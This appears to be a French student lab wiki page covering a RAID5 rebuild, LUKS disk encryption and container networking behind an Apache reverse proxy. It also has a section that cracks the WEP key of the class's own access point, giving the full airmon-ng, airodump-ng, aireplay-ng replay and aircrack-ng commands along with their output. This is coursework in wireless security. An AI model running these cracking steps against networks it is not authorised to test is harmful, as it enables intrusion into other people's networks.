 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous n'avons qu'une carte SD pour tous les binômes. On crée donc un disque logiciel localement sur /dev/mmcblk1 nous-mêmes pour &lt;br /&gt;
effectuer son cryptage en AES avec un hachage SHA256 et on renseigne un mot de passe de cryptage.&lt;br /&gt;
&lt;br /&gt;
    '''cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1'''&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons la partition Luks, puis nous formatons le disque :&lt;br /&gt;
&lt;br /&gt;
    '''cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
    mkfs.ext4 /dev/mapper/banane-crypt'''&lt;br /&gt;
&lt;br /&gt;
On monte le disque et on crée un fichier avec du texte dessus.&lt;br /&gt;
&lt;br /&gt;
    '''mount /dev/mapper/banane-crypt /mnt&lt;br /&gt;
    vi /mnt/test.txt'''&lt;br /&gt;
&lt;br /&gt;
On démonte ensuite le disque et on ferme la partition Luks.&lt;br /&gt;
&lt;br /&gt;
    '''umount /mnt&lt;br /&gt;
    cryptsetup luksClose banane-crypt'''&lt;br /&gt;
&lt;br /&gt;
Pour vérifier le cryptage de notre disque, on tente d'accéder de nouveau au disque et on s'aperçoit qu'on nous demande le mot de passe.&lt;br /&gt;
&lt;br /&gt;
    '''cryptsetup luksOpen /dev/sdb1 banane-crypt'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Crackage de clef WEP sur Point d'accès Wi-Fi&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On dispose de deux Zabeth munies chacune d'une clé Wi-Fi. Le point d'accès &amp;quot;banane&amp;quot; a été configuré par le groupe 3, qui a aussi installé les drivers pour ces clefs Wi-Fi&lt;br /&gt;
&lt;br /&gt;
On commence par établir la connexion au point d'accès Wifi banane sur une des Zabeth (la Zabeth17 en l'occurence). En lançant iwconfig, on voit que l'interface wlx000fb5922374 n'est pas active. Pour cela, on configure comme suit le fichier /etc/network/interfaces avec les paramètres de connexion du réseau banane.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth17:/home/pifou# cat /etc/network/interfaces'''&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
 &lt;br /&gt;
 source /etc/network/interfaces.d/*&lt;br /&gt;
 &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback &lt;br /&gt;
&lt;br /&gt;
 auto wlx000fb5922374&lt;br /&gt;
 iface wlx000fb5922374 inet static&lt;br /&gt;
  wireless-keymode open&lt;br /&gt;
  wireless-mode managed&lt;br /&gt;
  address 10.2.0.100&lt;br /&gt;
  netmask 255.255.0.0&lt;br /&gt;
  wireless-essid banane&lt;br /&gt;
  wireless-key 01234567891011121314151617&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WEP-1.png]]&lt;br /&gt;
&lt;br /&gt;
On redémarre ensuite les connexions réseau et on démarre l'interface wlx000fb5922374 pour établir la connexion sur banane. Et on vérifie avec iwconfig que la connexion est établie.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth17:/home/pifou# service networking restart&lt;br /&gt;
 root@zabeth17:/home/pifou# ifdown wlx000fb5922374&lt;br /&gt;
 root@zabeth17:/home/pifou# ifup wlx000fb5922374'''&lt;br /&gt;
&lt;br /&gt;
[[Fichier:2.png]]&lt;br /&gt;
&lt;br /&gt;
Ensuite, on génère du trafic sur le réseau en envoyant 11000 paquets de type ARP vers 10.2.0.2 l'adresse du point d'accès.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth17:/home/pifou# nping --arp-type ARP -c 11000  --flags rst --ttl 2 10.2.0.2'''&lt;br /&gt;
&lt;br /&gt;
 Starting Nping 0.7.60 ( https://nmap.org/nping ) at 2017-12-12 15:13 GMT&lt;br /&gt;
 SENT (0.0373s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (0.2238s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (1.0378s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (1.2438s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (2.0387s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (2.0638s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (3.0399s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (3.0839s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (4.0419s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (4.1078s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (5.0439s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WEP-5.png]]&lt;br /&gt;
&lt;br /&gt;
Nous mettons à présent la clef Wi-Fi de la deuxième Zabeth (Zabeth15) en mode moniteur pour écouter, et on vérifie que le nom de l'interface est devenu wlan0mon. &lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# airmon-ng start wlx000fb5922266'''&lt;br /&gt;
 &lt;br /&gt;
 Found 3 processes that could cause trouble.&lt;br /&gt;
 If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
 a short period of time, you may want to run 'airmon-ng check kill' &lt;br /&gt;
 &lt;br /&gt;
  PID Name&lt;br /&gt;
 1695 dhclient&lt;br /&gt;
 2949 avahi-daemon&lt;br /&gt;
 2950 avahi-daemon&lt;br /&gt;
 &lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
&lt;br /&gt;
 phy0	wlx000fb5922266	p54usb		NetGear, Inc. WG111(v1) rev 2 54 Mbps Wireless [Intersil ISL3887]&lt;br /&gt;
 Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
 &lt;br /&gt;
	 	(mac80211 monitor mode vif enabled on [phy0]wlan0mon&lt;br /&gt;
	 	(mac80211 station mode vif disabled for [phy0]wlx000fb5922266)&lt;br /&gt;
 &lt;br /&gt;
Ensuite, on trouve le BSSID, CH (channel) et ESSID du réseau Wi-Fi à cracker (banane).&lt;br /&gt;
 &lt;br /&gt;
 '''root@zabeth15:/home/pifou# airodump-ng --encrypt wep wlan0mon'''&lt;br /&gt;
 &lt;br /&gt;
 CH  8 ][ Elapsed: 6 s ][ 2017-12-12 15:04                                         &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                        &lt;br /&gt;
 C4:14:3C:12:61:C2  -67       26        0    0   9  54e. WEP  WEP         BORNE_TEST3                   &lt;br /&gt;
 C4:14:3C:12:61:C1  -61       28        0    0   9  54e. WEP  WEP         BORNE_TEST2                   &lt;br /&gt;
 C4:14:3C:40:78:60  -70       21        0    0   3  54e. WEP  WEP         ananas                        &lt;br /&gt;
 C4:14:3C:40:78:63  -76       20        0    0   3  54e. WEP  WEP         goyave                         &lt;br /&gt;
 C4:14:3C:12:61:C4  -68       25        0    0   9  54e. WEP  WEP         BORNE_TEST5                   &lt;br /&gt;
 C4:14:3C:12:61:C0  -68       27        0    0   9  54e. WEP  WEP         BORNE_TEST1                   &lt;br /&gt;
 C4:14:3C:12:61:C3  -63       25        0    0   9  54e. WEP  WEP         BORNE_TEST4                   &lt;br /&gt;
 C4:14:3C:40:78:61  -73       16        0    0   3  54e. WEP  WEP         banane                        &lt;br /&gt;
 C4:14:3C:40:78:64  -68       14        0    0   3  54e. WEP  WEP         groseille                     &lt;br /&gt;
 C4:14:3C:40:78:65  -74       22        0    0   3  54e. WEP  WEP         reseau1                       &lt;br /&gt;
 C4:14:3C:12:61:C5  -59       24        0    0   9  54e. WEP  WEP         BORNE_TEST6                    &lt;br /&gt;
 C4:14:3C:40:78:62  -72       16        0    0   3  54e. WEP  WEP         durian                        &lt;br /&gt;
 C4:14:3C:40:78:67  -77       16        0    0   3  54e. WEP  WEP         tomate                        &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 (not associated)   AC:AF:B9:B0:DF:32  -75    0 - 1      0        1  PolytechLille                       &lt;br /&gt;
 (not associated)   B8:08:D7:16:6E:69  -73    0 - 1      0        1                                      &lt;br /&gt;
 (not associated)   60:F4:45:D0:DA:DB  -73    0 - 1      0        2  PolytechLille  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''pifou@zabeth15:~$ su'''&lt;br /&gt;
 Password: &lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# iwconfig'''&lt;br /&gt;
 wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=17 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
           &lt;br /&gt;
 enp0s25   no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 enp6s0    no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 lo        no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 docker0   no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 vmnet1    no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 bridge    no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 vethcdea1bf  no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
On va maintenant surveiller le réseau et capturer les informations qui circulent.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon'''&lt;br /&gt;
&lt;br /&gt;
 # -c 3 précise que le réseau est sur le channel 3.&lt;br /&gt;
 # -w crack_wep_ungdelatte est le fichier qui va stocker les paquets capturés.&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 20 mins ][ 2017-12-12 15:18                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   8    11488        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En plus de airodump-ng, on génère encore plus de trafic sur le réseau pour éviter d'attendre très longtemps d'avoir assez de paquets.&lt;br /&gt;
&lt;br /&gt;
 '''aireplay-ng -3 -b C4:14:3C:40:78:61 -h 00:0F:B5:92:23:74 wlan0mon'''&lt;br /&gt;
 # -3 précise un ARP Request Replay Attack. &lt;br /&gt;
 # 00:0F:B5:92:23:74 étant l'adresse MAC de l'interface wlx000fb5922374 du premier ordinateur qui connecté sur le réseau. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour finir, on lance le crackage de la clef WEP à partir du fichier .cap créé.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-01.cap'''&lt;br /&gt;
&lt;br /&gt;
 Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
 Read 12494 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
 Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
 Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
 Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon'''&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 28 mins ][ 2017-12-12 16:03                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   0    16423        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
                                                                   &lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# ls'''&lt;br /&gt;
 3D				       Documents&lt;br /&gt;
 Arduino				       Downloads&lt;br /&gt;
 crack_wep_ungdelatte-01.cap	       GIS4_Bernard_Castelein&lt;br /&gt;
 crack_wep_ungdelatte-01.csv	       IMA5sc-ASR&lt;br /&gt;
 crack_wep_ungdelatte-01.kismet.csv     Music&lt;br /&gt;
 crack_wep_ungdelatte-01.kismet.netxml  Pictures&lt;br /&gt;
 crack_wep_ungdelatte-02.cap	       Public&lt;br /&gt;
 crack_wep_ungdelatte-02.csv	       R&lt;br /&gt;
 crack_wep_ungdelatte-02.kismet.csv     replay_arp-1212-153701.cap&lt;br /&gt;
 crack_wep_ungdelatte-02.kismet.netxml  Templates&lt;br /&gt;
 Desktop				       Videos&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-02.cap'''&lt;br /&gt;
 Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
 Read 13001 packets.&lt;br /&gt;
  &lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
 Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
 Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
 Got no data packets from target network!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
Le crakage n'ayant pas fonctionné après deux fois, nous avons cherché notre erreur car les paquets récupérés par la Zabeth15 semblent vides, mais nous n'avons pas trouvé...&lt;br /&gt;
&lt;br /&gt;
--- &lt;br /&gt;
&lt;br /&gt;
Réussite en soutenance&lt;br /&gt;
&lt;br /&gt;
En lançant le crack après avoir écouté sur la bonne adresse MAC (terminant par 74), nous avons réussi à trouver la clef WEP, qui correspond bien à celle configurée.&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-03.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-03.cap&lt;br /&gt;
Read 211094 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    WEP (30765 IVs)&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-03.cap&lt;br /&gt;
Attack will be restarted every 5000 captured ivs.&lt;br /&gt;
Starting PTW attack with 30887 ivs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                 Aircrack-ng 1.2 rc4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:00] Tested 24537 keys (got 30676 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    4/  6   EE(37632) 01(37376) 95(37376) 20(36864) CD(36864) &lt;br /&gt;
    1    0/  1   23(43520) 7F(37376) 14(36352) 33(36352) 90(36352) &lt;br /&gt;
    2    0/  2   45(41472) 16(38656) E9(37376) C4(37120) 22(36352) &lt;br /&gt;
    3    0/  2   67(42240) B1(39168) 5B(36864) 15(36608) 0E(36352) &lt;br /&gt;
    4    0/  1   89(42496) 53(38912) 9F(38400) 9D(37888) E6(37888) &lt;br /&gt;
    5    0/  1   10(46080) ED(38656) A1(37888) F9(37888) 34(36608) &lt;br /&gt;
    6    1/  3   11(39680) 97(38144) BC(36352) 18(36096) 21(36096) &lt;br /&gt;
    7    1/  4   12(37632) 57(36608) EA(36352) A6(35840) E8(35840) &lt;br /&gt;
    8    7/ 20   13(36352) 49(36096) 5C(36096) 8D(36096) A3(35840) &lt;br /&gt;
    9    0/  1   14(42240) C7(38912) 30(36864) 47(36864) D5(36864) &lt;br /&gt;
   10    0/  1   15(44544) AF(39424) B6(38144) A9(37632) D8(37120) &lt;br /&gt;
   11    0/  1   16(43008) E7(38144) C2(37888) 07(36864) 16(36864) &lt;br /&gt;
   12    0/  5   17(39936) 1A(38400) 2B(38144) 60(37120) 71(36864) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ 01:23:45:67:89:10:11:12:13:14:15:16:17 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau et création de conteneurs sous Machine Virtuelle Linux&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On se propose dans cette partie de réaliser la création et la mise en réseau de conteneurs sous Linux.&lt;br /&gt;
&lt;br /&gt;
Après avoir créé un système de fichiers avec debootstrap puis une machine virtuelle (IMA5-BANANE en l'occurence) sur le serveur de virtualisation Cordouan, on crée trois conteneurs C1, C2 et C3 distincts au sein celle-ci.&lt;br /&gt;
&lt;br /&gt;
Connecter les conteneurs en réseau :&lt;br /&gt;
&lt;br /&gt;
    créer une double interface Ethernet virtuelle ;&lt;br /&gt;
    sur l’hôte ajouter l’interface dans un pont virtuel ;&lt;br /&gt;
    envoyer le pair dans l’espace réseau du conteneur ;&lt;br /&gt;
    configurer l’adresse IP sur l’interface du conteneur ...&lt;br /&gt;
    ... il peut être nécessaire d’utiliser nsenter. &lt;br /&gt;
&lt;br /&gt;
Pour la création d'un conteneur, on utilise la commande unshare couplée à des options et à une fonction serverx.sh qui ne fait que repeter une fonction sleep 5 en boucle. Elle permet de lancer séparément une commande (ici /bin/serverx.sh) en définissant un root différent.&lt;br /&gt;
&lt;br /&gt;
    '''unshare -n -u -m -p -f chroot ./chroot /bin/serverx.sh'''&lt;br /&gt;
&lt;br /&gt;
Si on veut entrer dans le conteneur après en être sorti, on utilise la commande:&lt;br /&gt;
&lt;br /&gt;
    '''nsenter -n -u -m -p -t &amp;lt;PID&amp;gt; chroot ./chroot /bin/bash'''&lt;br /&gt;
&lt;br /&gt;
On ajoute alors toutes nos interfaces virtuelles eth0@vifX de type veth. Les Ponts &amp;quot;monpont&amp;quot; et &amp;quot;carrefour&amp;quot; ont déjà été définis dans /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
    '''ip link add vif1 type veth peer name eth0@vif1&lt;br /&gt;
    ip link add vif2 type veth peer name eth0@vif2&lt;br /&gt;
    ip link add vif3 type veth peer name eth0@vif3&lt;br /&gt;
    ip link add vif4 type veth peer name eth0@vif4'''&lt;br /&gt;
&lt;br /&gt;
On ajoute les vifx aux ponts correspondants&lt;br /&gt;
&lt;br /&gt;
    '''ip link set vif1 master monpont&lt;br /&gt;
    ip link set vif2 master carrefour &lt;br /&gt;
    ip link set vif3 master carrefour&lt;br /&gt;
    ip link set vif4 master carrefour'''&lt;br /&gt;
 &lt;br /&gt;
On peut vérifier la création à chaque commande grâce aux la commande:&lt;br /&gt;
&lt;br /&gt;
    '''ip l show et brctl show'''&lt;br /&gt;
&lt;br /&gt;
L'adresse ip de &amp;quot;monpont&amp;quot; est défini dans le fichier interfaces avec l'adresse 193.48.57.179 et est connecté au réseau via eth0&lt;br /&gt;
Nous avons choisis le reseau local entre les conteneur sur la plage 192.168.0.0/24. L'adresse de &amp;quot;carrefour&amp;quot; est 192.168.0.1.&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif1 (renommée eth0) comme étant l'interface entre le reverse proxy et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    '''ip link set eth0@vif1 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0'''&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif2 (renommée eth1) comme étant l'interface entre le reverse proxy et les carrefour.&lt;br /&gt;
&lt;br /&gt;
    '''ip link set eth0@vif2 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth1'''&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif3 et eth0@vif4 (renommées eth0) comme étant les interfaces respectives entre le server1, serveur 2 et le pont carrefour.&lt;br /&gt;
&lt;br /&gt;
    '''ip link set eth0@vif3 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
    ip link set eth0@vif4 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0'''&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur &amp;quot;chroot&amp;quot;, on ajoute alors l'adresse IP 193.48.57.189/28 à eth0 et on active eth0, vif1 et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    '''ip addr add 193.48.57.189/28 dev eth0&lt;br /&gt;
    ip link set dev eth0 up&lt;br /&gt;
    ip link set vif1 up&lt;br /&gt;
    ip link set dev monpont up'''&lt;br /&gt;
&lt;br /&gt;
Dans le conteneurs serverX et dans le reverse proxy, on ajoute alors les adresse IP 192.168.0.100/24 et 192.168.0.200/24 et 192.168.0.150/24 aux eth0 respectifs puis on active vif2 vif3 vif4 et &amp;quot;carrefour&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Le réseau étant fonctionnel nous pouvons nous attaquer à la configuration des serveur apache2.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc installé un serveur apache2 dans chaque conteneur.&lt;br /&gt;
&lt;br /&gt;
Pour ce qui est du serveur apache qui jouera le rôle de reverse proxy le fichier de configuration se trouvant dans /etc/apache2/sites-available sera configuré de la manière suivante:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ServerName 193.48.57.189:80&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.189:80&amp;gt;&lt;br /&gt;
 ServerName reverse.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
 ProxyPass / http://192.168.0.100:631&lt;br /&gt;
 ProxyPassReverse / http://192.168.0.100:631&lt;br /&gt;
 ProxyRequests Off&lt;br /&gt;
 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On retrouve l'adresse du serveur apache qui correspond à celle du conteneur relié au réseau 192.48.57.189.&lt;br /&gt;
&lt;br /&gt;
On redirigera les requêtes via le port 631 (TCP/UDP) toutefois il est tout à fais possible de le faire circuler sur le port 80 car les serveurs se trouvent normalement dans des conteneurs.&lt;br /&gt;
&lt;br /&gt;
Au niveau de '''server1'''(équivalent pour server2) j'ai seulement cré un serveur apache2 sous cette forme:&lt;br /&gt;
&lt;br /&gt;
 ServerName 192.168.0.100:631&lt;br /&gt;
 &amp;lt;VirtualHost 192.168.0.100:631&amp;gt;&lt;br /&gt;
 ServerName site1.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
il peut être nécessaire de demander dans ports.conf d'écouter le port 631.&lt;br /&gt;
&lt;br /&gt;
Dans le dns db.banane.space nous avons rajouter les différentes adresses:&lt;br /&gt;
&lt;br /&gt;
 reverse IN	A	193.48.57.189&lt;br /&gt;
 site1   IN	A	193.48.57.189&lt;br /&gt;
 site2	 IN	A	193.48.57.189&lt;br /&gt;
&lt;br /&gt;
Nous n'avons pas réussis à tester le fonctionnement car nous avons rencontré une erreur au niveau de la commande '''nsenter'''. en effet les conteneur ne sont pas isolés des processus extérieurs. Tous nos serveurs apaches ce sont donc installés or des '''unshare''' et forcément ne cohabitent donc pas très bien ensemble. Nous avons trouvé une piste qui serait en lien avec le /proc/self du système. la commande '''nsenter''' ne reconnaît pas les processus monté pas '''mount'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
J'ai créé un script test.conf se trouvant dans /pra.&lt;br /&gt;
&lt;br /&gt;
 #!/bin/bash&lt;br /&gt;
&lt;br /&gt;
 ip addr add 192.168.0.1/24 dev carrefour&lt;br /&gt;
 ip link set dev carrefour up&lt;br /&gt;
&lt;br /&gt;
 echo &amp;quot;creation interface virtuelle&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 ip link add vif1 type veth peer name eth0@vif1&lt;br /&gt;
 ip link add vif2 type veth peer name eth0@vif2&lt;br /&gt;
 ip link add vif3 type veth peer name eth0@vif3&lt;br /&gt;
 ip link add vif4 type veth peer name eth0@vif4&lt;br /&gt;
&lt;br /&gt;
 echo &amp;quot;deplacement interface dans les ponts&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 ip link set vif1 master monpont&lt;br /&gt;
 ip link set vif2 master carrefour&lt;br /&gt;
 ip link set vif3 master carrefour&lt;br /&gt;
 ip link set vif4 master carrefour&lt;br /&gt;
&lt;br /&gt;
 echo &amp;quot;creation conteneurs&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 unshare -n -u -m -p -f chroot /chroot /bin/config.sh &amp;amp;&lt;br /&gt;
 pid1=$!&lt;br /&gt;
 unshare -n -u -m -p -f chroot /server1 /bin/config.sh &amp;amp;&lt;br /&gt;
 pid2=$!&lt;br /&gt;
 unshare -n -u -m -p -f chroot /server2 /bin/config.sh &amp;amp;&lt;br /&gt;
 pid3=$!&lt;br /&gt;
&lt;br /&gt;
 echo &amp;quot;deplacement interfaces dans les conteneurs&amp;quot;&lt;br /&gt;
 sleep 5&lt;br /&gt;
 ip link set eth0@vif1 netns /proc/$pid1/ns/net name eth0&lt;br /&gt;
 ip link set eth0@vif2 netns /proc/$pid1/ns/net name eth1&lt;br /&gt;
 ip link set eth0@vif3 netns /proc/$pid2/ns/net name eth0&lt;br /&gt;
 ip link set eth0@vif4 netns /proc/$pid3/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
 echo &amp;quot;ifup vif&amp;quot;&lt;br /&gt;
 sleep 5&lt;br /&gt;
 ip link set dev vif1 up&lt;br /&gt;
 ip link set dev vif2 up&lt;br /&gt;
 ip link set dev vif3 up&lt;br /&gt;
 ip link set dev vif4 up&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ce script permet de lancer l’ensemble des commande du dessus de façon à créer et configurer les conteneurs d'un seul coup.&lt;br /&gt;
tous le conteneur sont lancé grâce a la commande '''unshare''' avec la commande /bin/config.sh.&lt;br /&gt;
Dans chaque système de fichier des conteneur vous trouverez donc dans /bin un fichier config.sh qui permet de faire les configurations réseaux intra-conteneur et de lancer les serveurs apaches.&lt;br /&gt;
&lt;br /&gt;
Les serveurs apaches ne veulent plus se lancer à cause de l’erreur suivante:&lt;br /&gt;
&lt;br /&gt;
 httpd (pid 23) already running&lt;br /&gt;
 httpd (pid 11) already running&lt;br /&gt;
 httpd (pid 11) already running&lt;br /&gt;
&lt;br /&gt;
les conteneur sont donc détruits car les serveurs apaches qui doivent tourner en tache de fond ne se lance pas.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
configuration des serveurs apaches:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
reverse proxy:&lt;br /&gt;
&lt;br /&gt;
 ServerName 193.48.57.189:80&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.189:80&amp;gt;&lt;br /&gt;
 ServerName reverse.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
&lt;br /&gt;
 ProxyPass / http://192.168.0.100:80&lt;br /&gt;
 ProxyPassReverse / http://192.168.0.100:80&lt;br /&gt;
